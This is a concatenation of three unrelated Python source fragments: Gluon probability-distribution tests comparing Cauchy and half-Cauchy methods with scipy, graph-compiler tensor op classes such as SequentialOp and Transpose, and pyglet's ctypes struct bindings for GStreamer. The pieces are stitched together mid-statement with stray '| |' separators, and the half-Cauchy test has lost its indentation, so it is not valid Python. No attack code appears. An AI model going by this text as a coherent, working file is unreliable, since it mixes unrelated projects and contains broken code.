@use_np
def test_gluon_cauchy_v1():
    """Check mgp.Cauchy sampling and log_prob/cdf/icdf/entropy against scipy.

    Fixes over the previous version: the wrapper block now calls
    ``super().__init__()`` before setting attributes (consistent with every
    sibling test block — assigning to ``self`` before Block initialization is
    fragile), and an unused ``samples`` local in the sampling loop is removed.
    """
    class TestCauchy(HybridBlock):
        # Thin wrapper forwarding a single distribution method through
        # HybridBlock so both imperative and hybridized paths are exercised.
        def __init__(self, func):
            super(TestCauchy, self).__init__()
            self._func = func

        def hybrid_forward(self, F, loc, scale, *args):
            cauchy = mgp.Cauchy(loc, scale, F, validate_args=True)
            return _distribution_method_invoker(cauchy, self._func, *args)

    shapes = [(), (1,), (2, 3), 6]
    # Test sampling
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        net = TestCauchy("sample")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale)
        desired_shape = (shape,) if isinstance(shape, Number) else shape
        assert mx_out.shape == desired_shape
    # Test log_prob
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        samples = np.random.normal(size=shape)
        net = TestCauchy("log_prob")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale, samples).asnumpy()
        np_out = ss.cauchy(loc.asnumpy(),
                           scale.asnumpy()).logpdf(samples.asnumpy())
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
    # Test cdf
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        samples = np.random.normal(size=shape)
        net = TestCauchy("cdf")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale, samples).asnumpy()
        np_out = ss.cauchy(loc.asnumpy(),
                           scale.asnumpy()).cdf(samples.asnumpy())
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
    # Test icdf: probabilities are kept away from 0 and 1 because the Cauchy
    # quantile function diverges at the endpoints.
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        samples = np.random.uniform(size=shape, low=1e-4, high=1.0-1e-4)
        net = TestCauchy("icdf")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale, samples).asnumpy()
        np_out = ss.cauchy(loc.asnumpy(),
                           scale.asnumpy()).ppf(samples.asnumpy())
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
    # Test entropy
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        net = TestCauchy("entropy")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale).asnumpy()
        np_out = ss.cauchy(loc.asnumpy(),
                           scale.asnumpy()).entropy()
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
@use_np
def test_gluon_half_cauchy_v1():
class TestHalfCauchy(HybridBlock):
def __init__(self, func):
super(TestHalfCauchy, self).__init__()
self._func = func
def hybrid_forward(self, F, scale, *args):
half_normal = mgp.HalfCauchy(scale, F, validate_args=True)
return getattr(half_normal, self._func)(*args)
shapes = [(), (1,), (2, 3), 6]
# Test sampling
for shape, hybridize in itertools.product(shapes, [True, False]):
scale = np.random.uniform(0.5, 1.5, shape)
net = TestHalfCauchy("sample")
if hybridize:
net.hybridize()
mx_out = net(scale).asnumpy()
if isinstance(shape, Number):
shape = (shape,)
assert mx_out.shape == shape
# Test log_prob
for shape, hybridize in itertools.product(shapes, [True, False]):
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.abs(np.random.normal(size=shape))
net = TestHalfCauchy("log_prob")
if hybridize:
net.hybridize()
mx_out = net(scale, samples).asnumpy()
np_out = ss.halfcauchy(0, scale.asnumpy()).logpdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test cdf
for shape, hybridize in itertools.product(shapes, [True, False]):
scale = np.random.uniform(0.5, 1.5, shape)
samples = np.abs(np.random.normal(size=shape))
net = TestHalfCauchy("cdf")
if hybridize:
net.hybridize()
mx_out = net(scale, samples).asnumpy()
np_out = ss.halfcauchy(0, scale.asnumpy()).cdf(samples.asnumpy())
assert_almost_equal(mx_out, np_out, atol=1e-4,
rtol=1e-3, use_broadcast=False)
# Test icdf
for shape, hybridize in itertools.product(shapes, [True, False]):
scale = np.random.uniform(0.5, 1.5, shape)
samples | |
y.
delta: Backprop amount for this Op.
*args: The args of this Op.
"""
pass
@property
def shape(self):
    """
    Required by parameter initializers in legacy neon code, which expect
    layers to implement a ``shape`` they can pass through layers.

    Returns: self.axes
    """
    return self.axes
def shape_dict(self):
    """
    Returns: shape of this tensor as a dictionary (delegates to the axes).
    """
    return self.axes.shape_dict()
def mean(self, reduction_axes=None, out_axes=None):
    """
    Used in the Neon front end; delegates to the module-level mean().

    Returns: mean(self)
    """
    return mean(self, reduction_axes=reduction_axes, out_axes=out_axes)
class ValueOp(TensorOp, ControlBlockOp):
    """
    Mixin class for ops whose value is another op.

    Most tensor attributes (axes, dtype, constness, etc.) are delegated to
    the supplying op.

    Arguments:
        tensor: The tensor supplying the value for this op.
    """
    def __init__(self, tensor=None, **kwargs):
        # args=() because the supplying tensor is tracked via _tensor and
        # all_deps rather than as a positional argument.
        super(ValueOp, self).__init__(args=(), is_value_op=True, **kwargs)
        self._tensor = tensor

    def tensor_description(self):
        return self.tensor.tensor_description()

    @property
    def tensor(self):
        """
        The op that ultimately supplies the value. See value_tensor.

        Follows the full forwarding chain (forwarded.tensor.forwarded), so
        this is the transitive closure, not the immediate supplier.

        Returns:
            The op that supplies the value.
        """
        if self._tensor is not None:
            return self._tensor.forwarded.tensor.forwarded
        else:
            return None

    @property
    def value_tensor(self):
        """
        The op whose value is returned by this op.

        Returns:
            The immediate value returned by this op; see tensor for the closure.
        """
        if self._tensor is not None:
            return self._tensor.forwarded
        else:
            return None

    @value_tensor.setter
    def value_tensor(self, tensor):
        self._tensor = tensor

    @property
    def all_deps(self):
        """
        TODO: use cached property as other Op
        """
        base_deps = super(ValueOp, self).all_deps
        if self.value_tensor is not None and self.value_tensor.is_device_op:
            # Add value_tensor if it is a real op
            return base_deps | OrderedSet([self.value_tensor])
        else:
            return base_deps

    @property
    def is_tensor_op(self):
        return self.tensor.is_tensor_op

    @property
    def axes(self):
        return self.tensor.axes

    @property
    def dtype(self):
        return self.tensor.dtype

    @dtype.setter
    def dtype(self, dtype):
        self.tensor.dtype = default_dtype(dtype)

    @property
    def is_constant(self):
        return self.tensor.is_constant

    @property
    def const(self):
        return self.tensor.const

    @property
    def scale(self):
        return self.tensor.scale

    @property
    def states_read(self):
        # State access is reported by the immediate value op.
        return self.value_tensor.states_read

    @property
    def states_written(self):
        return self.value_tensor.states_written

    def generate_add_delta(self, adjoints, delta):
        # Backprop flows through to the supplying tensor.
        self.tensor.generate_add_delta(adjoints, delta)

    @property
    def effective_tensor_op(self):
        # Due to hard to correct class hierarchy, state access is wrapped in ValueOp, but we
        # always want state access wrapped in a state reader such as TensorValueOp, so we
        # need to resort to some ugliness here.
        tensor = self._tensor
        if tensor.is_state_op:
            return self.forwarded
        return tensor.effective_tensor_op
class SequentialOp(ValueOp):
    """
    Given a list of ops, ensure that every op that has not already been executed is executed in
    the given order. The value of the last op is the value of this op.

    Ops will only be executed once, so to return the value of an earlier op, just add it again at
    the end of the list.

    Control dependencies are not computed until after the graph is computed, i.e. after derivatives
    are expanded.

    Arguments:
        ops: Sequence of ops to compute. If not specified, set the attribute ops when known. This
            is useful for subclassing.

    Attributes:
        ops: The list of ops to be computed. The last op is the returned value.
    """
    def __init__(self, ops=None, **kwargs):
        super(SequentialOp, self).__init__(**kwargs)
        self.value_tensor = None
        self._ops = None
        if ops is not None:
            # Legal child patterns
            # 1. (AssignOp,)+, (~(SequentialOp|ParallelOp))
            # 2. ParallelOp, (~(AssignOp|SequentialOp|ParallelOp))
            # 3. SequentialOp, (~(AssignOp|SequentialOp|ParallelOp))
            num_children = len(ops)
            if num_children < 2:
                raise RuntimeError("SequentialOp need at least two children")
            if isinstance(ops[0], AssignOp):
                # Pattern 1: a run of assignments followed by one value op.
                if isinstance(ops[-1], (ParallelOp, SequentialOp)):
                    raise RuntimeError("Illegal child formation")
                for op in ops[:-1]:
                    if not isinstance(op, AssignOp):
                        raise RuntimeError("Illegal child formation")
            elif isinstance(ops[0], (ParallelOp, SequentialOp)):
                # Patterns 2/3: exactly one nested block plus one value op.
                if num_children > 2:
                    raise RuntimeError("Illegal child formation")
                elif isinstance(ops[-1], (AssignOp, SequentialOp, ParallelOp)):
                    raise RuntimeError("Illegal child formation")
            else:
                raise RuntimeError("Illegal child formation")
            self.ops = ops

    @property
    def ops(self):
        return self._ops

    @ops.setter
    def ops(self, ops):
        # Normalize everything to forwarded ops and make this op depend on
        # each of them; the last op supplies this op's value.
        self._ops = list(as_op(op).forwarded for op in ops)
        for op in self._ops:
            self.add_control_dep(op)
        self.value_tensor = self._ops[-1]

        # Ops that have already executed.
        done_ops = set()
        # State => op_tops that have written state
        writers = defaultdict(OrderedSet)
        # State => op_tops that have read state
        readers = defaultdict(OrderedSet)
        for op_top in self._ops:
            ordered_ops = Op.ordered_ops([op_top])
            # Make ops that read/write state execute after the op_tops that last read/wrote
            # the state.
            for op in ordered_ops:
                if op in done_ops:
                    # The op already ran, so it doesn't run here
                    continue
                for state in op.states_read:
                    for write_op in writers[state]:
                        op.add_control_dep(write_op)
                for state in op.states_written:
                    for read_op in readers[state]:
                        op.add_control_dep(read_op)
            # Register this op_top with each state it read/wrote.
            # NOTE(review): registration records op_top (the whole subtree's
            # root), not the individual op — presumably so later subtrees
            # order against entire earlier steps; confirm before changing.
            for op in ordered_ops:
                if op in done_ops:
                    # The op already ran, so it doesn't run here
                    continue
                for state in op.states_written:
                    writers[state].add(op_top)
                for state in op.states_read:
                    readers[state].add(op_top)
            done_ops.update(ordered_ops)

    @property
    def is_sequencing_op(self):
        """
        Returns:
            True if this op's sole purpose is to influence the sequencing of other ops.
        """
        return True
def sequential(ops=None):
    """
    Compute every op in order, compatible with existing dependencies,
    returning the last value.

    Ops execute at most once, so to return the value of an earlier op, append
    it again at the end of the list.

    Arguments:
        ops: Sequence of ops to compute.
    """
    seq_op = SequentialOp(ops)
    seq_op.deriv_handler = seq_op.value_tensor
    # The SequentialOp itself (not its value_tensor) must be returned:
    # returning the bare value op would not force trailing ops to execute,
    # e.g. for [op_1, op_2, op_3, op_1] the value is op_1 but op_2/op_3
    # still need to run.
    return seq_op
class TensorValueOp(ValueOp):
    """
    A read of an AssignableTensorOp.

    Wrapping each read lets different versions of the state carry different
    control information.

    Arguments:
        tensor: The tensor being wrapped.
    """
    def __init__(self, tensor, **kwargs):
        super(TensorValueOp, self).__init__(tensor=tensor, **kwargs)
        # Propagate placement metadata from the wrapped state, when present.
        self.metadata.update({key: tensor.metadata[key]
                              for key in ['device', 'device_id', 'parallel']
                              if key in tensor.metadata})

    @property
    def states_read(self):
        return OrderedSet([self.tensor])

    @property
    def effective_tensor_op(self):
        return self.forwarded
class PatternLabelOp(TensorOp):
    """
    Represents a label in a graph pattern to be matched.

    constraint_fn is a predicate that must hold for the label to bind to a
    matching op; by default it always holds.
    """
    def __init__(self, label, constraint_fn=(lambda op: True), axes=None, **kwargs):
        super(PatternLabelOp, self).__init__(
            axes={} if axes is None else axes, **kwargs)
        self.label = label
        self.constraint_fn = constraint_fn
class PatternSkipOp(TensorOp):
    """
    Lets a user of pattern matching skip the match for certain ops.

    is_optional_op_fn is a predicate identifying which ops are optional;
    the default treats no op as optional.
    """

    def __init__(self, arg, is_optional_op_fn=(lambda op: False), **kwargs):
        super(PatternSkipOp, self).__init__(axes={}, args=(arg,), **kwargs)
        self.is_optional_op_fn = is_optional_op_fn
class IndexOp(with_metaclass(abc.ABCMeta, TensorOp)):
    """
    Base class for ops that reinterpret how a tensor is indexed, i.e. that
    produce a view of the same underlying tensor.

    Arguments:
        x: A view of a tensor.

    Returns:
        A view of the tensor.
    """

    def __init__(self, x, **kwargs):
        super(IndexOp, self).__init__(args=(x,), dtype=x.dtype, **kwargs)

    @abc.abstractmethod
    def transform_tensor_description(self, tensor_description):
        """
        Apply this index operation to tensor_description.

        Args:
            tensor_description: TensorDescription of the input view.

        Returns:
            TensorDescription of the transformed view.
        """

    @tdcache()
    def tensor_description(self):
        input_td = self.args[0].tensor_description()
        return self.transform_tensor_description(input_td).named(self.name)

    @property
    def is_scalar(self):
        """
        Reshaping adds shape information but does not stop the underlying
        value from being a scalar.

        Returns:
            True if the value comes from a scalar.
        """
        return self.args[0].is_scalar

    @property
    def scalar_op(self):
        return self.args[0].scalar_op

    @property
    def is_constant(self):
        return self.args[0].is_constant

    @property
    def const(self):
        return self.args[0].const

    @property
    def is_device_op(self):
        """
        Returns:
            False; index ops are resolved by the transformer rather than
            executed on the device.
        """
        return False

    @property
    def states_read(self):
        # A view shares storage with its argument, so it reads the same states.
        return self.args[0].states_read
class Transpose(IndexOp):
    """
    Reverses the order of a tensor's axes.

    Arguments:
        x: A tensor.
    """

    def __init__(self, x, **kwargs):
        super(Transpose, self).__init__(x, axes=reversed(x.axes), **kwargs)

    def transform_tensor_description(self, tensor_description):
        return tensor_description.transpose()

    def generate_adjoints(self, adjoints, delta, x):
        # The adjoint of a transpose is the transpose of the delta.
        x.generate_add_delta(adjoints, Transpose(delta))
class AxesCastOp(IndexOp):
    """
    Relabels a tensor with known axes without altering its value.

    Arguments:
        x: A tensor.
        axes: The new axes.
    """

    def __init__(self, x, axes, **kwargs):
        axes = make_axes(axes)
        self._check_valid_axes(x, axes)
        super(AxesCastOp, self).__init__(x, axes=axes, **kwargs)

    def _check_valid_axes(self, x, axes):
        # A non-scalar may only be relabeled to axes of identical lengths.
        if not x.is_scalar and x.axes.lengths != axes.lengths:
            raise ValueError(
                "casting axes {} must have the same length as original axes {}"
                .format(axes, x.axes))

    def transform_tensor_description(self, tensor_description):
        return tensor_description.cast(self.axes)

    def generate_adjoints(self, adjoints, delta, x):
        # The gradient is simply the delta cast back to the original axes.
        x.generate_add_delta(adjoints, cast_axes(delta, x.axes))

    def copy_with_new_args(self, args):
        return type(self)(args[0], axes=self.axes)
class RoleCastOp(AxesCastOp):
"""
Used to set the names of the axes of a tensor, without altering its value.
If the names of | |
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2007 <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id: gstreamer.py 1033 2007-07-13 03:38:16Z Alex.Holkner $
'''High-level Gstreamer interface.
'''
import _ctypes
import ctypes
from ctypes import util
import time
import sys
import pyglet.lib
# Dynamically load the GLib / GObject / GStreamer 0.10 shared libraries.
glib = pyglet.lib.load_library('glib-2.0')
gobject = pyglet.lib.load_library('gobject-2.0')
gst = pyglet.lib.load_library('gstreamer-0.10')
gstbase = pyglet.lib.load_library('gstbase-0.10')

# GStreamer version these bindings target.
GST_VERSION_MAJOR = 0
GST_VERSION_MINOR = 10
GST_VERSION_BUILD = 11

# GstState enumeration values (element lifecycle states).
GST_STATE_VOID_PENDING = 0
GST_STATE_NULL = 1
GST_STATE_READY = 2
GST_STATE_PAUSED = 3
GST_STATE_PLAYING = 4

# GstFormat value for time-based positions.
GST_FORMAT_TIME = 3

# Plugin init entry point: returns gboolean (int), takes a GstPlugin pointer.
GstPluginInitFunc = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p)

# Reserved-pointer padding sizes used by the GStreamer ABI structs below.
GST_PADDING = 4
GST_PADDING_LARGE = 20
# ctypes mirror of the C GstPluginDesc struct (plugin registration record).
# Field order and types must match the GStreamer 0.10 ABI exactly.
class GstPluginDesc(ctypes.Structure):
    _fields_ = [
        ('major_version', ctypes.c_int),
        ('minor_version', ctypes.c_int),
        ('name', ctypes.c_char_p),
        ('description', ctypes.c_char_p),
        ('plugin_init', GstPluginInitFunc),
        ('version', ctypes.c_char_p),
        ('license', ctypes.c_char_p),
        ('source', ctypes.c_char_p),
        ('package', ctypes.c_char_p),
        ('origin', ctypes.c_char_p),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING)
    ]

# GObject type-system primitives: GType ids and the standard init callbacks.
GType = ctypes.c_ulong
GBaseInitFunc = ctypes.CFUNCTYPE(None, ctypes.c_void_p)
GClassInitFunc = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
GInstanceInitFunc = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
# ctypes mirror of the GLib GTypeInfo struct (type registration data).
class GTypeInfo(ctypes.Structure):
    _fields_ = [
        ('class_size', ctypes.c_uint16),
        ('base_init', GBaseInitFunc),
        ('base_finalize', ctypes.c_void_p),
        ('class_init', GClassInitFunc),
        ('class_finalize', ctypes.c_void_p),
        ('class_data', ctypes.c_void_p),
        ('instance_size', ctypes.c_uint16),
        ('n_preallocs', ctypes.c_uint16),
        ('instance_init', GInstanceInitFunc),
        ('value_table', ctypes.c_void_p),
    ]

# Header shared by every GObject class structure.
class GTypeClass(ctypes.Structure):
    _fields_ = [
        ('g_type', GType),
    ]

# Header shared by every GObject instance structure.
class GTypeInstance(ctypes.Structure):
    _fields_ = [
        ('g_class', ctypes.POINTER(GTypeClass)),
    ]

# ctypes mirror of the GObject base instance struct.
class GObject(ctypes.Structure):
    _fields_ = [
        ('g_type_instance', GTypeInstance),
        ('ref_count', ctypes.c_uint),
        ('qdata', ctypes.c_void_p),
    ]

# ctypes mirror of the GObjectClass struct; vtable slots kept opaque.
class GObjectClass(ctypes.Structure):
    _fields_ = [
        ('g_type_class', GTypeClass),
        ('construct_properties', ctypes.c_void_p),
        ('constructor', ctypes.c_void_p),
        ('set_property', ctypes.c_void_p),
        ('get_property', ctypes.c_void_p),
        ('dispose', ctypes.c_void_p),
        ('finalize', ctypes.c_void_p),
        ('dispatch_properties_changed', ctypes.c_void_p),
        ('notify', ctypes.c_void_p),
        ('pdummy', ctypes.c_void_p * 8),
    ]
# ctypes mirror of the GstCaps struct (media capability description).
class GstCaps(ctypes.Structure):
    _fields_ = [
        ('type', GType),
        ('refcount', ctypes.c_int),
        ('flags', ctypes.c_int),
        ('structs', ctypes.c_void_p),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]

# ctypes mirror of GstStaticCaps: a GstCaps plus its string form.
class GstStaticCaps(ctypes.Structure):
    _fields_ = [
        ('caps', GstCaps),
        ('string', ctypes.c_char_p),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]
def GST_STATIC_CAPS(string):
    """Build a GstStaticCaps holding an empty caps header and the given caps string."""
    empty_caps = GstCaps()
    return GstStaticCaps(empty_caps, string)
# GstPadPresence values.
GST_PAD_ALWAYS = 0
GST_PAD_SOMETIMES = 1
GST_PAD_REQUEST = 2

# GstPadDirection values.
GST_PAD_UNKNOWN = 0
GST_PAD_SRC = 1
GST_PAD_SINK = 2

# ctypes mirror of GstStaticPadTemplate.
class GstStaticPadTemplate(ctypes.Structure):
    _fields_ = [
        ('name_template', ctypes.c_char_p),
        ('direction', ctypes.c_int),
        ('presence', ctypes.c_int),
        ('static_caps', GstStaticCaps),
    ]

# ctypes mirror of the GstObject base struct.
class GstObject(ctypes.Structure):
    _fields_ = [
        ('object', GObject),
        ('refcount', ctypes.c_int),
        ('lock', ctypes.c_void_p),
        ('name', ctypes.c_char_p),
        ('name_prefix', ctypes.c_char_p),
        ('parent', ctypes.c_void_p),
        ('flags', ctypes.c_uint32),
        ('_gst_reserved', ctypes.c_void_p),
    ]

# ctypes mirror of GstObjectClass; vtable slots kept opaque.
class GstObjectClass(ctypes.Structure):
    _fields_ = [
        ('parent_class', GObjectClass),
        ('path_string_separator', ctypes.c_char),
        ('signal_object', ctypes.c_void_p),
        ('lock', ctypes.c_void_p),
        ('parent_set', ctypes.c_void_p),
        ('parent_unset', ctypes.c_void_p),
        ('object_saved', ctypes.c_void_p),
        ('deep_notify', ctypes.c_void_p),
        ('save_thyself', ctypes.c_void_p),
        ('restore_thyself', ctypes.c_void_p),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING)
    ]

# ctypes mirror of GstElementDetails (human-readable element metadata).
class GstElementDetails(ctypes.Structure):
    _fields_ = [
        ('longname', ctypes.c_char_p),
        ('klass', ctypes.c_char_p),
        ('description', ctypes.c_char_p),
        ('author', ctypes.c_char_p),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]

# Scalar type aliases used throughout the element/clock structs.
GstState = ctypes.c_int
GstStateChangeReturn = ctypes.c_int
GstClockTimeDiff = ctypes.c_int64
GstClockID = ctypes.c_void_p
GstClockTime = ctypes.c_uint64
GstClockTimeDiff = ctypes.c_int64
GST_CLOCK_TIME_NONE = -1

# ctypes mirror of GstMiniObject (refcounted lightweight object header).
class GstMiniObject(ctypes.Structure):
    _fields_ = [
        ('instance', GTypeInstance),
        ('refcount', ctypes.c_int),
        ('flags', ctypes.c_uint),
        ('_gst_reserved', ctypes.c_void_p),
    ]
# An event's numeric id lives above the flag bits.
GST_EVENT_TYPE_SHIFT = 4

# Event direction / serialization flag bits.
GST_EVENT_TYPE_UPSTREAM = 1 << 0
GST_EVENT_TYPE_DOWNSTREAM = 1 << 1
GST_EVENT_TYPE_SERIALIZED = 1 << 2


def GST_EVENT_MAKE_TYPE(num, flags):
    """Combine an event number with its flag bits, mirroring the C macro."""
    return flags | (num << GST_EVENT_TYPE_SHIFT)


GstEventType = ctypes.c_int

# End-of-stream event: travels downstream, serialized with the data flow.
GST_EVENT_EOS = GST_EVENT_MAKE_TYPE(
    5, GST_EVENT_TYPE_DOWNSTREAM | GST_EVENT_TYPE_SERIALIZED)
# ctypes mirror of GstEvent.
class GstEvent(ctypes.Structure):
    _fields_ = [
        ('mini_object', GstMiniObject),
        ('type', GstEventType),
        ('timestamp', ctypes.c_uint64),
        ('src', ctypes.c_void_p),
        ('structure', ctypes.c_void_p),
        ('_gst_reserved', ctypes.c_void_p),
    ]

# ctypes mirror of GstBuffer (a chunk of media data with timing info).
class GstBuffer(ctypes.Structure):
    _fields_ = [
        ('mini_object', GstMiniObject),
        ('data', ctypes.c_void_p),
        ('size', ctypes.c_uint),
        ('timestamp', GstClockTime),
        ('duration', GstClockTime),
        ('caps', ctypes.POINTER(GstCaps)),
        ('offset', ctypes.c_uint64),
        ('offset_end', ctypes.c_uint64),
        ('malloc_data', ctypes.c_void_p),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]

# ctypes mirror of GstSegment (playback segment configuration).
class GstSegment(ctypes.Structure):
    _fields_ = [
        ('rate', ctypes.c_double),
        ('abs_rate', ctypes.c_double),
        ('format', ctypes.c_int),
        ('flags', ctypes.c_int),
        ('start', ctypes.c_int64),
        ('stop', ctypes.c_int64),
        ('time', ctypes.c_int64),
        ('accum', ctypes.c_int64),
        ('last_stop', ctypes.c_int64),
        ('duration', ctypes.c_int64),
        #('applied_rate', ctypes.c_double), ABI added 0.10.6
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]

#TEMP
# GstPad is not mirrored as a full struct here; it is treated as an opaque
# stand-in type so POINTER(GstPad) signatures below are well-formed.
GstPad = ctypes.c_int
GstFlowReturn = ctypes.c_int

# Pad callback signatures used by source/sink element implementations.
GstPadChainFunction = ctypes.CFUNCTYPE(GstFlowReturn,
    ctypes.POINTER(GstPad), ctypes.POINTER(GstBuffer))
GstPadSetCapsFunction = ctypes.CFUNCTYPE(ctypes.c_int,
    ctypes.POINTER(GstPad), ctypes.POINTER(GstCaps))
GstPadEventFunction = ctypes.CFUNCTYPE(ctypes.c_int,
    ctypes.POINTER(GstPad), ctypes.POINTER(GstEvent))
GstPadGetRangeFunction = ctypes.CFUNCTYPE(ctypes.c_int,
    ctypes.POINTER(GstPad), ctypes.c_uint64, ctypes.c_uint,
    ctypes.POINTER(ctypes.POINTER(GstBuffer)))
# ctypes mirror of GstElement (base class for all pipeline elements).
class GstElement(ctypes.Structure):
    _fields_ = [
        ('object', GstObject),
        ('state_lock', ctypes.c_void_p),
        ('state_cond', ctypes.c_void_p),
        ('state_cookie', ctypes.c_uint32),
        ('current_state', GstState),
        ('next_state', GstState),
        ('pending_state', GstState),
        ('last_return', GstStateChangeReturn),
        ('bus', ctypes.c_void_p),
        ('clock', ctypes.c_void_p),
        ('base_time', GstClockTimeDiff),
        ('numpads', ctypes.c_uint16),
        ('pads', ctypes.c_void_p),
        ('numsrcpads', ctypes.c_uint16),
        ('srcpads', ctypes.c_void_p),
        ('numsinkpads', ctypes.c_uint16),
        ('sinkpads', ctypes.c_void_p),
        ('pads_cookie', ctypes.c_uint32),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]

# ctypes mirror of GstElementClass; vtable slots kept opaque.
class GstElementClass(ctypes.Structure):
    _fields_ = [
        ('parent_class', GstObjectClass),
        ('details', GstElementDetails),
        ('elementfactory', ctypes.c_void_p),
        ('padtemplates', ctypes.c_void_p),
        ('numpadtemplates', ctypes.c_int),
        ('pad_templ_cookie', ctypes.c_uint32),
        ('pad_added', ctypes.c_void_p),
        ('pad_removed', ctypes.c_void_p),
        ('no_more_pads', ctypes.c_void_p),
        ('request_new_pad', ctypes.c_void_p),
        ('release_pad', ctypes.c_void_p),
        ('get_state', ctypes.c_void_p),
        ('set_state', ctypes.c_void_p),
        ('change_state', ctypes.c_void_p),
        ('set_bus', ctypes.c_void_p),
        ('provide_clock', ctypes.c_void_p),
        ('set_clock', ctypes.c_void_p),
        ('get_index', ctypes.c_void_p),
        ('set_index', ctypes.c_void_p),
        ('send_event', ctypes.c_void_p),
        ('get_query_types', ctypes.c_void_p),
        ('query', ctypes.c_void_p),
        ('_gst_reserved', ctypes.c_void_p * GST_PADDING),
    ]

# ctypes mirror of GstBaseSrc (base class for source elements).
class GstBaseSrc(ctypes.Structure):
    _fields_ = [
        ('element', GstElement),
        ('srcpad', ctypes.POINTER(GstPad)),
        ('live_lock', ctypes.c_void_p),
        ('live_cond', ctypes.c_void_p),
        ('is_live', ctypes.c_int),
        ('live_running', ctypes.c_int),
        ('blocksize', ctypes.c_int),
        ('can_activate_push', ctypes.c_int),
        ('pad_mode', ctypes.c_int),
        ('seekable', ctypes.c_int),
        ('random_access', ctypes.c_int),
        ('clock_id', GstClockID),
        ('end_time', GstClockTime),
        ('segment', GstSegment),
        ('need_newsegment', ctypes.c_int),
        ('offset', ctypes.c_uint64),
        ('size', ctypes.c_uint64),
        ('num_buffers', ctypes.c_int),
        ('num_buffers_left', ctypes.c_int),
        ('_gst_reserved', ctypes.c_void_p * (GST_PADDING_LARGE - 1)),
        ('priv', ctypes.c_void_p),
    ]

# ctypes mirror of GstBaseSrcClass; overridable slots are typed CFUNCTYPEs
# so Python callbacks can be installed, the rest stay opaque.
class GstBaseSrcClass(ctypes.Structure):
    _fields_ = [
        ('parent_class', GstElementClass),
        ('get_caps', ctypes.CFUNCTYPE(ctypes.c_void_p,
            ctypes.POINTER(GstBaseSrc))),
        ('set_caps', ctypes.CFUNCTYPE(ctypes.c_int,
            ctypes.POINTER(GstBaseSrc), ctypes.c_void_p)),
        ('negotiate', ctypes.CFUNCTYPE(ctypes.c_int,
            ctypes.POINTER(GstBaseSrc))),
        ('newsegment', ctypes.CFUNCTYPE(ctypes.c_int,
            ctypes.POINTER(GstBaseSrc))),
        ('start', ctypes.CFUNCTYPE(ctypes.c_int,
            ctypes.POINTER(GstBaseSrc))),
        ('stop', ctypes.CFUNCTYPE(ctypes.c_int,
            ctypes.POINTER(GstBaseSrc))),
        ('get_times', ctypes.CFUNCTYPE(None,
            ctypes.POINTER(GstBaseSrc), ctypes.POINTER(GstBuffer),
            ctypes.POINTER(GstClockTime), ctypes.POINTER(GstClockTime))),
        ('get_size', ctypes.CFUNCTYPE(ctypes.c_int,
            ctypes.POINTER(GstBaseSrc), ctypes.POINTER(ctypes.c_uint64))),
